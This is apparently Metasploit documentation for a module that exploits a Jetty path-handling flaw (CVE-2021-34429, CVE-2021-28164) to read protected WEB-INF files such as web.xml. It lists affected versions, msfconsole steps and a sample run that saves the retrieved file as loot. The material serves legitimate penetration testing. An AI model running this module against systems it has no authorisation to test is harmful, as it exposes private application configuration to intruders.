documentation/modules/auxiliary/gather/jetty_web_inf_disclosure.md
## Vulnerable Application
Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access
protected files in the `WEB-INF` folder.
Versions effected are:
- 9.4.37.v20210219, 9.4.38.v20210224
- 9.4.37-9.4.42
- 10.0.1-10.0.5
- 11.0.1-11.0.5
Exploitation can obtain any file in the `WEB-INF` folder, but web.xml is most likely
to have information of value.
### CVE-2021-34429
Use the Docker image from [ColdFusionX](https://github.com/ColdFusionX/CVE-2021-34429) at
https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml
## Verification Steps
1. Install Jetty with an app that contains a `WEB-INF` folder
1. Start msfconsole
1. Do: `use auxiliary/gather/jetty_web_inf_disclosure`
1. Do: `set rhosts`
1. Do: `run`
1. You should get the contents of a file
## Options
### FILE
The file in the `WEB-INF` folder to retrieve. Defaults to `web.xml`
### CVE
Which vulnerability to use. Options: `CVE-2021-34429`, `CVE-2021-28164`. Defaults to `CVE-2021-34429`
## Scenarios
### Jetty 11.0.5 from Docker
```
resource (jetty.rb)> use auxiliary/gather/jetty_web_inf_disclosure
resource (jetty.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (jetty.rb)> set rport 8080
rport => 8080
resource (jetty.rb)> set verbose true
verbose => true
resource (jetty.rb)> run
[*] Running module against 1.1.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version: 11.0.5
[+] 11.0.5 vulnerable to CVE-2021-34429
[!] The service is running, but could not be validated.
[+] File stored to /home/h00die/.msf4/loot/20211108134054_default_1.1.1.1_jetty.web.xml_813220.xml
[+] <!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>
```